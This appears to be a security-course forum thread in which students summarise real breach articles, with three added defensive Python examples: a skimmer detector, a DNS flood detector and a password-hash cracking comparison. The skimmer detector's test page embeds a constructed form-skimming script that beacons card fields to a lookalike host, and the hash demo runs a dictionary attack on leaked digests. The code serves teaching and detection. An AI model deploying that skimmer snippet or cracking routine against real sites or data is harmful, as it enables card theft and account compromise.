During the week, research an article that describes a recent breach (hack) of an organization. Of special interest this week, does the article discuss whether the organization had conducted some sort of vulnerability scans, penetration tests, and/or red or blue team exercises?
When citing the article, include the URL, so that others can read the rest of the article.
Eugene Angelo Tartaglione says
https://slate.com/technology/2020/08/uber-joseph-sullivan-charged-data-breach.html
In this article it is discussed that the Department of Justice charged Uber’s former chief security officer Joseph Sullivan with obstruction of justice for trying to cover up a data breach the ride-share service experienced in late 2016.
Instead of telling the public about the data breach, leadership from Uber paid the perpetrators $100,000 for their silence about the incident. They later announced the breach in October 2017.
Kelly Sharadin says
No honor among thieves; hackers love the notoriety they receive for their attacks. On the flip side, I know ethical hackers also love the same type of notoriety for “exposing” a breach, which can lead to inflated instances of ‘hacks’ where really no unique information was actually leaked.
Humbert Amiani says
Eugene, it is quite surprising just how many organisations go to such lengths to hide breaches. In some isolated cases this silencing might be a good thing, since it buys the company time to seal the loophole, rather than announcing while still working on it only for another group of hackers to take advantage of it. Cisco could have used this strategy a while ago when a vulnerability was found on their systems; right when they made it public, it was exploited.
Candace T Nelson says
There is almost nothing that bothers me more than companies that fail to appropriately address data breaches and ultimately fall victim to them one or two or more times after the initial event (and I use the term victim lightly, especially after the second or third breach…). I have either experienced (Equifax) or studied (Trump Hotels) so many of these companies while participating in the ITACS program at Temple it practically makes me ill. My credit remains frozen at all three credit reporting bureaus because – quite frankly – I don’t trust any one of them to keep my PII safe. It seems that the fines and penalties should be exponentially higher for each subsequent breach since the reputational impact on these repeat offenders does not seem sufficient to drive change.
Nicholas Fabrizio says
Hi Candace,
I agree with you that it is infuriating how some companies handle data breaches and how customers deal with the aftermath. I too have frozen my credit reports due to some fraudulent activity I’ve experienced as a result of an organization’s data breach. It seems much safer to just keep my credit frozen and unfreeze it as needed.
Zhuofu Wang says
Paying a ransom to hackers will only make them more aggressive in stealing more information, but sometimes you have no choice. The company still needs to maintain a high degree of attention, even after giving the hackers what they demanded and obtaining a “guarantee” from them. The company needs to resolve the vulnerabilities in the shortest time possible to prevent them from being exploited by other hackers.
Jerry Butler says
Man, Uber upper management had a lot of issues during this time span. Accountability is going to come down very hard on companies in legislation. GDPR is one that comes to mind. Companies like Uber are international, and the things they can get away with will come to a screeching halt.
Anthony Wong says
I completely agree… the punishment should be more severe simply because Uber tried to hide the breach. Regardless of the end result, I think it drastically affects the company’s reputation. If Uber was unethical enough to hide a data breach, who knows what else they could be hiding.
Eugene Angelo Tartaglione says
“On Nov. 14, 2016, Sullivan received an email from johndoughs@protonmail.com (get it?) claiming that the sender had found a “major vulnerability” in Uber’s database of customer information and had been able to “dump uber database and many other things,” indicating that they had been able to access all the information stored in the database and “dump” it onto their own servers.”
So it seems that it was an outside actor who found these vulnerabilities in Uber’s databases. It does not seem like they did internal pen testing; instead it was someone else.
Zhuofu Wang says
“APT Hackers Exploit Autodesk 3ds Max Software for Industrial Espionage”
URL: https://thehackernews.com/2020/08/autodesk-malware-attack.html?&web_view=true
Bitdefender’s Cyber Threat Intelligence Lab found an espionage attack, which was targeting an unnamed international architectural and video production company. The researcher mentioned that “the cybercriminal group infiltrated the company using a tainted and specially crafted plugin for Autodesk 3ds Max”, and “the sophistication of the attack reveals an APT-style group that had prior knowledge of the company’s security systems and used software applications, carefully planning their attack to infiltrate the company and exfiltrate data undetected”(Ravie).
This shows that this attack was not a spontaneous attack by the APT hacker group. Some competing private companies may “hire” the APT group to seek confidential information to win contracts for luxury projects. As competition in the real estate industry has become increasingly fierce, industrial espionage has gradually escalated and become more frequent.
Kelly Sharadin says
Hi Zhuofu,
I posted about Deathstalker last, an APT that also operates in the industrial espionage space. I think this is a really fascinating area to research – thanks for sharing this article.
Nicholas Fabrizio says
Title: Skimming Attack Hits American Payroll Association
URL: https://www.infosecurity-magazine.com/news/skimming-attack-hits-american/
In July 2020 the American Payroll Association (APA) discovered malware on the login page and checkout section of its online store. The APA’s IT department uncovered the malware after investigating unusual activity dating back to May and determined the potential information stolen included login credentials, names, dates of birth, and credit card information. Their investigation also found that the malware was installed via a vulnerability in their content management system (CMS). The APA has since installed additional antivirus software on their servers and updated their content management system with the latest security patches. In my opinion it sounds as if this company could have prevented this attack by performing routine security assessments on their servers, which may have caught the out-of-date CMS security patches.
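Nick’s post describes a web skimmer sitting on the login and checkout pages, and the APA only noticed it by chasing “unusual activity” months later. A control that would have surfaced it on day one, independent of the CMS patch level, is a baseline of which scripts those pages are supposed to load, with an alert whenever a new external host or an unrecognised inline script shows up. The following is an added example written for this thread; it is not code from the article or from the APA. The checkout page, the injected skimmer, the hostnames and the allowlist are all constructed, and the example uses only the Python standard library so it can be run offline.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page standing in for a known-good snapshot (not the APA's real page).
BASELINE_HTML = """<html><body>
<form id="checkout" action="/checkout" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example.org/lib/forms.js"></script>
<script>window.cartId = "c-1001";</script>
</body></html>"""

# Same page after a Magecart-style injection (constructed): one extra external script from a
# lookalike host plus an inline hook that beacons the submitted form fields off-site.
TAMPERED_HTML = BASELINE_HTML.replace(
    "</body>",
    '<script src="https://js.checkout-metrics.example/m.js"></script>\n'
    '<script>document.getElementById("checkout").addEventListener("submit",function(){'
    'navigator.sendBeacon("https://js.checkout-metrics.example/c",'
    'new URLSearchParams(new FormData(this)).toString());});</script>\n'
    "</body>",
)

# Hosts the page may load scripts from (assumed); relative, same-origin URLs are always allowed.
ALLOWED_HOSTS = {"cdn.example.org"}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and SHA-256 digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(hashlib.sha256(body.encode()).hexdigest())
            self._in_script = False


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def find_unexpected_scripts(html, allowed_hosts, baseline_inline_hashes):
    """Return (kind, detail) findings for scripts the baseline does not account for."""
    findings = []
    external, inline = collect_scripts(html)
    for src in external:
        host = urlparse(src).hostname
        if host is not None and host not in allowed_hosts:
            findings.append(("unknown_external_script", src))
    for digest in inline:
        if digest not in baseline_inline_hashes:
            findings.append(("unknown_inline_script", digest))
    return findings


def scan(html):
    """Scan a fetched page against the baseline snapshot's allowlist and inline-script digests."""
    baseline_hashes = set(collect_scripts(BASELINE_HTML)[1])
    return find_unexpected_scripts(html, ALLOWED_HOSTS, baseline_hashes)


if __name__ == "__main__":
    for kind, detail in scan(TAMPERED_HTML):
        print(kind, detail)
```

Run against the baseline it reports nothing; run against the tampered page it reports the lookalike host and the new inline script. In practice the baseline would be refreshed whenever a legitimate deploy changes the page, and the scan would fetch the live checkout page on a schedule, since skimmers are often served only to real visitors and not to the CMS admin.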
Candace T Nelson says
Thank you for this post, Nick. I find it interesting that these hackers attacked a non-profit organization with a large number of members (approximately 21,000). It is not unusual that a non-profit might not have sufficient funds to invest in securing its technology infrastructure. In a sense, I guess that makes organizations of this nature particularly vulnerable to cyber attacks. It also seems that there may have been some satisfaction gained by the “intruders” in that they successfully breached a notorious and highly regarded association whose focus is on payroll, which hits home for any one of us who has ever received a paycheck.
Anthony Wong says
Wow, it’s hard to believe something as simple as CMS patches was not identified and implemented regularly by the IT department. I think the APA should implement monitoring services that would help them identify issues more quickly. APA will definitely re-evaluate their security policies and review their applications more frequently. In the article, it notes APA paid for credit monitoring services for those affected, but I would be curious to see how much money this breach cost them.
Bryan Garrahan says
I think companies tend to take the approach of focusing on and protecting systems that are responsible for performing financial transactions. This could be due to financial or resource limitations, but it could also be that companies don’t fully understand how valuable their data is. I believe in this case the company may not have taken into consideration the appropriate risk associated with the CMS, which therefore led to less control and ultimately a compromise of PII data.
Kelly Sharadin says
A known macOS malware was able to bypass Apple’s automated scans to gain access to its App Store as an “approved” app. “Shlayer” adware is one of the most notorious malware campaigns to affect macOS machines. The hack was reported to Apple’s security researchers by a college student who discovered the malicious code through Homebrew’s website, a Mac development tool. Apple revoked the app’s notarization and removed the adware from its store the same day. Thomas Reed, Malwarebytes’ director of Mac and mobile platforms, is not surprised by the malicious bypass. He is quoted saying “Mac malware like adware evolve to get around notarization.” Attackers try to exploit notarization as a way to gain users’ trust to download malicious apps that slip through trusted platforms like the App Store. Apple’s App Store notarization process is designed to stop malware from being deployed to unsuspecting App Store customers, although it would appear its automated scanning needs some tweaking.
https://www.wired.com/story/apple-approved-malware-macos-notarization-shlayer/
Jerry Butler says
Man, the recon of Shlayer must have been good. They are well known but were able to figure out what criteria are needed to get approved.
Kelly Sharadin says
Exactly, Jerry, that’s what makes this pretty astounding!
Humbert Amiani says
European ISPs hit by DDoS attacks
Several ISPs in Belgium, France and the Netherlands suffered a wave of DDoS attacks that lasted several hours. Services from the respective ISPs were brought to a halt before the attacks were eventually mitigated. It was discovered that the attacks targeted the DNS infrastructure and routers of the target ISPs.
NBIP, a non-profit organisation founded by Dutch ISPs to combat DDoS attacks, was able to track and mitigate most of the attacks, making services from the ISPs available again. It is suspected that the attacks were conducted by a criminal gang that engages in DDoS extortion of financial institutions.
https://www.zdnet.com/article/european-isps-report-mysterious-wave-of-ddos-attacks/?&web_view=true
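Humbert’s post notes that the attacks went after the ISPs’ DNS infrastructure. The two DNS flood shapes a resolver operator most often has to pick out of query logs are a single source hammering ANY queries (the classic reflection/amplification probe, where the source is usually the spoofed victim) and a “random subdomain” flood, where many sources each send a few queries for non-existent names under one zone so that the cache never helps and every query hits the authoritative server. The detection logic below is an added example written for this thread, not code from the article, NBIP or any ISP. The log format, addresses, zones and thresholds are all constructed; a real deployment would read the resolver’s own query log and tune the thresholds to its baseline traffic.

```python
import random
from collections import Counter, defaultdict
from datetime import datetime


def build_sample_log(seed=1):
    """Constructed resolver query log, one '<iso-timestamp> <client> <qtype> <qname>' per line.
    Not taken from any ISP or from the ZDNet article; addresses are documentation ranges."""
    rng = random.Random(seed)
    ts = "2020-08-28T09:00:00"
    lines = []
    # Benign: a handful of subscribers doing ordinary lookups.
    for i in range(5):
        for name in ("www.isp-portal.example", "mail.isp-portal.example", "cdn.example.org"):
            lines.append(f"{ts} 198.51.100.{10 + i} A {name}")
    # One source hammering ANY queries for a small zone: reflection/amplification pattern.
    lines += [f"{ts} 203.0.113.5 ANY isp-portal.example" for _ in range(60)]
    # Random-subdomain flood: many (spoofable) sources, one query each, all against one zone.
    for i in range(120):
        lines.append(f"{ts} 192.0.2.{i + 1} A {i:04d}-{rng.getrandbits(24):06x}.victim-zone.example")
    rng.shuffle(lines)
    return lines


def parse_line(line):
    ts, client, qtype, qname = line.split()
    return datetime.fromisoformat(ts), client, qtype.upper(), qname.lower().rstrip(".")


def zone_of(qname, labels=2):
    """Crude zone cut: the last two labels. Good enough for constructed names."""
    return ".".join(qname.split(".")[-labels:])


def detect(lines, window_s=1, rate_threshold=50, any_threshold=10, subdomain_threshold=100):
    """Return sorted (kind, subject, count) alerts for the three flood indicators."""
    per_client = Counter()            # (window, client) -> queries
    any_per_client = Counter()        # (window, client) -> ANY queries
    names_per_zone = defaultdict(set)  # (window, zone) -> distinct qnames
    for line in lines:
        ts, client, qtype, qname = parse_line(line)
        window = int(ts.timestamp()) // window_s
        per_client[(window, client)] += 1
        if qtype == "ANY":
            any_per_client[(window, client)] += 1
        names_per_zone[(window, zone_of(qname))].add(qname)

    alerts = []
    for (_, client), n in per_client.items():
        if n > rate_threshold:
            alerts.append(("query_flood", client, n))
    for (_, client), n in any_per_client.items():
        if n > any_threshold:
            alerts.append(("amplification_probe", client, n))
    for (_, zone), names in names_per_zone.items():
        if len(names) > subdomain_threshold:
            alerts.append(("random_subdomain_flood", zone, len(names)))
    return sorted(alerts)


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(*alert)
```

The per-client counter alone would never catch the random-subdomain flood, because each spoofed source sends only one query; the per-zone distinct-name count is what exposes it. Conversely, the ANY source trips both the rate and the ANY counters, which is why both show up in the output. Response-rate limiting on the authoritative side and dropping ANY at the resolver edge are the usual mitigations once these are confirmed.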
Candace T Nelson says
I am really glad that you posted this article, Humbert. I also read the accompanying article about the criminal gang engaging in DDoS extortion against global financial institutions, including Venmo. I have contemplated enrolling in Venmo since the pandemic began as a method to fund organizations that I used to frequent and now participate in virtually. Having read this convinced me that – in light of the increase in cyberattacks since the global pandemic began and working from home became the “new normal” – my reluctance to engage in new and unfamiliar methods of transferring cash is based on sound logic as opposed to being old fashioned.
Humbert Amiani says
Candace, in this day financial institutions are at the mercy of cyber-criminals. The pandemic amplified the occurrences due to the shift to teleworking and the added security burden as organisations try to ensure employees get access to all resources remotely.
Anthony Wong says
I think it’s pretty smart of these criminals: if they are unable to break into the financial institution itself, they start to attack key vendors that will affect its business operations. For example, besides ISPs, hackers could target vendors that provide payment processing services and credit reporting agencies.
Candace T Nelson says
Carnival must right the ship after breaches threaten travelers’ trust
https://www.scmagazine.com/home/security-news/data-breach/carnival-must-right-the-ship-after-breaches-threaten-travelers-trust/?ocid=uxbndlbing
In this article, the author revealed that Carnival Cruise Lines detected a ransomware attack on August 15th that accessed and encrypted a portion of the technology systems of one of its brands and downloaded data files that contained customer personal information. Since 2019, Carnival has been the victim of two confirmed cyberattacks and a potential third attack, including a 2019 data breach that impacted the company’s Princess and Holland America cruise lines that was committed via deceptive phishing emails. It is noteworthy that this breach was initially identified in May 2019 and appears to have spanned the period from April 11 through July 23, 2019.
It is believed that the current breach may have resulted from Carnival’s use of vulnerable devices and their failure to apply available patches in a timely manner. Specifically, exploitation of a Citrix vulnerability (CVE-2019-19781) and a Palo Alto Firewall flaw (CVE-2020-2021) could have allowed hackers to gain unauthorized access to the corporate networks.
The author went on to state that, after learning about the prior breach in March 2020, cyber intelligence company Prevailion began sorting through its data related to Carnival and discovered a malicious program. Prevailion attempted to warn Carnival, who failed to respond to their warnings. Prevailion refrained from going public with this information until the current breach was publicized.
It seems obvious that a thorough security assessment was not performed by or on behalf of Carnival after the breach that was identified in May 2019, since the networks were still so vulnerable to attack a year later. While data breaches are not always preventable, recurring breaches at the same company are difficult to ignore. Carnival claims the incident will not have a material impact on its business. However, it is difficult to measure the reputational harm that has been caused by this series of events. It is also too early to tell how significant the financial impact of allowing unauthorized access to the personal information of guests and employees may be on the world’s largest cruise operator.
Zhuofu Wang says
Thank you for your post. Although this sounds ridiculous, some companies will first evaluate the cost of repairing after discovering vulnerabilities. Sometimes they will not take any measures. So customers are often the ones who lose the most, and they don’t know anything about it.
Jerry Butler says
Thank you for the post. It’s definitely up to the company’s risk appetite whether they will mitigate risk or not. If I’m reading correctly, the data that was stolen was encrypted? If this is the case, then most companies won’t act.
Jerry Butler says
https://threatpost.com/elon-musk-confirms-tesla-factory-a-target-of-foiled-cyberattack/158762/
In this article, clearly Tesla has two safeguards in place from a form of pentesting. Social engineering is an extremely tough attack to counter. In this case the user was offered $100K, and then a million once executed. I wonder if they will implement a program that will reward users for this type of action. The power Tesla holds over public safety is high. I think at some point Tesla will have to be treated as highly as top secret government.
Anthony Wong says
I would agree an incentive program would be a great idea. In this case, I think Tesla was extremely lucky because the employee was ethical and reported the issue immediately. Perhaps with a different employee this would have ended differently. With a program in place, I think Tesla would lower its chances of another social engineering scheme to take place.
Kelly Sharadin says
This case was crazy. I love your idea of a rewarded honor system. I’m sure employment with Tesla involves insane binding contracts, but to further increase loyalty, you propose a really interesting idea. SpaceX is pretty much a government organization – I’m sure they share similar policies.
Anthony Wong says
The Jewish Federation of Greater Washington in Maryland was the victim of a $7.5 million hack. An employee was working from home because of the current environment; however, he was on his personal machine. The hack was discovered by a security contractor that noticed atypical email activity, which makes me think the attacker accomplished this through a phishing scam. As a result, employees are no longer allowed to use their personal laptops. The next step is an audit to determine if losses were greater than the estimated $7.5 million. It would be interesting to see how the organization determined it was safe for the employees to use their personal machines instead of providing work-sponsored laptops.
URL: https://hotforsecurity.bitdefender.com/blog/hacker-steals-7-5-million-from-maryland-non-profit-by-compromising-employees-personal-computer-24078.html?web_view=true
Bryan Garrahan says
When COVID-19 hit I was very impressed with our IT department’s ability to quickly adapt to a remote environment. Each employee at our organization was prepared to perform their daily job duties on a company-issued machine from their home. Unfortunately, I don’t believe this was the case for every business, and some had to deploy an all-hands-on-deck approach in order to get their employees up and running. Meanwhile, the security posture of organizations took a backseat because the approach was likely “We need to keep the lights on.” In this case specifically, it could have been that the employee had a desktop workstation at the office and simply didn’t have a company-issued laptop, so instead they were required to use a personal device.
Bryan Garrahan says
The Allegheny County Airport Authority sued Involta LLC after the firm allegedly did not adequately fulfill their promised cybersecurity services, which ultimately left the Airport Authority unprotected and exposed to several vulnerabilities within its network. The article states, “Among the duties required in the contract were providing maintenance and software support for servers used by the authority and providing cybersecurity services like vulnerability scans and penetration testing to “determine if vulnerabilities exist that could be exploited by nefarious parties to unlawfully access ACAA systems, devices or data.” The article continues, “Despite Involta’s contractual obligation to install patches and updates in a timely fashion, Involta allowed outdated and unpatched software to remain in use at ACAA for excessive periods of time, and Involta left known vulnerabilities unpatched.” While this article doesn’t actually reflect a hack, it does bring to light that your systems could easily be exploited even while performing best practices such as vulnerability scans. Organizations must be cautious in selecting vendors who provide them services because it could lead to financial and reputational losses – which was the case for the Allegheny County Airport Authority.
https://triblive.com/local/allegheny-county-airport-authority-sues-it-company-for-alleged-cybersecurity-failures/
Amelia Safirstein says
Greenville Technical College was attacked by hackers using ransomware. The hackers successfully gained access to the College’s systems using a vulnerability in the College’s VPN and encrypted data before demanding a ransom. Unfortunately for the hackers, the college had sufficient backups and they were able to restore their systems without giving into demands.
https://www.greenvilleonline.com/story/news/local/2020/08/28/greenville-tech-says-thwarts-data-breach-after-ransom-sought/5662602002/
Bryan Garrahan says
Thanks, Amelia – I’d be curious if Greenville Tech’s IT department considered and planned for an attack such as this before it actually occurred. Perhaps they were aware that there was no sensitive data living in the system and therefore their approach to mitigating the chance of data loss was to deploy sound backup and restore controls. Or perhaps they just lucked out by having non-sensitive data compromised, which motivated them to investigate other potentially vulnerable areas in their network along with the third-party cybersecurity vendor referenced in the article.
Jerry Butler says
https://krebsonsecurity.com/2020/12/account-hijacking-site-ogusers-hacked-again/
Roughly a week ago, the OGUsers homepage was defaced with a message stating the forum’s user database had been compromised. The hack was acknowledged by the forum’s current administrator, who assured members that their passwords were protected with a password obfuscation technology that was extremely difficult to crack.
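The administrator’s assurance that passwords were protected by an “obfuscation technology that was extremely difficult to crack” is the kind of claim worth testing rather than taking at face value, because how hard a leaked database is to crack depends almost entirely on whether the hashes are salted and whether the hash function is deliberately slow. The code below is an added example written for this thread; it is not from the Krebs article and says nothing about what OGUsers actually used. The accounts, passwords and wordlist are constructed. It stores the same passwords two ways, unsalted MD5 and per-user-salted scrypt, then runs the same dictionary attack against both and counts the work each one costs the attacker.

```python
import hashlib
import hmac
import os

# Constructed wordlist and accounts; not data from OGUsers or from the article.
WORDLIST = ["password", "123456", "letmein", "dragon", "qwerty", "ogusers2020"]
ACCOUNTS = {"alice": "dragon", "bob": "letmein", "carol": "Tr0ub4dor&3"}

# Interactive-login cost settings (assumed); production deployments raise n as hardware allows.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)


def md5_unsalted(password):
    """The 'obfuscation' too many forums ship with: fast, unsalted, one table cracks everyone."""
    return hashlib.md5(password.encode()).hexdigest()


def scrypt_salted(password, salt):
    """Memory-hard KDF with a per-user salt; every guess costs a full KDF evaluation."""
    return hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)


def build_dumps(accounts):
    """Produce the two 'leaked database' shapes from the same plaintexts."""
    md5_dump = {user: md5_unsalted(pw) for user, pw in accounts.items()}
    scrypt_dump = {}
    for user, pw in accounts.items():
        salt = os.urandom(16)  # stored alongside the digest, as it would be in the real table
        scrypt_dump[user] = (salt, scrypt_salted(pw, salt))
    return md5_dump, scrypt_dump


def crack_md5(dump, wordlist):
    """One pass over the wordlist recovers every matching account at once.
    Returns (recovered, hash_operations)."""
    table = {md5_unsalted(w): w for w in wordlist}
    recovered = {user: table[h] for user, h in dump.items() if h in table}
    return recovered, len(wordlist)


def crack_scrypt(dump, wordlist):
    """The salt defeats the shared table, so each (account, guess) pair is a separate KDF run.
    Returns (recovered, kdf_operations)."""
    recovered, work = {}, 0
    for user, (salt, digest) in dump.items():
        for w in wordlist:
            work += 1
            if hmac.compare_digest(scrypt_salted(w, salt), digest):
                recovered[user] = w
                break
    return recovered, work


if __name__ == "__main__":
    md5_dump, scrypt_dump = build_dumps(ACCOUNTS)
    print("md5   :", crack_md5(md5_dump, WORDLIST))
    print("scrypt:", crack_scrypt(scrypt_dump, WORDLIST))
```

Both attacks recover the same two weak passwords, so salting and a slow KDF do not save a user who picked “dragon”. The difference is the cost: the MD5 dump falls to six hash computations for the whole table, and that cost does not grow with the number of accounts, while the scrypt dump costs one KDF run per account per guess (thirteen here, each far slower than an MD5), and scales linearly with the size of the leak. That, not the word “obfuscation”, is what determines whether “extremely difficult to crack” is true.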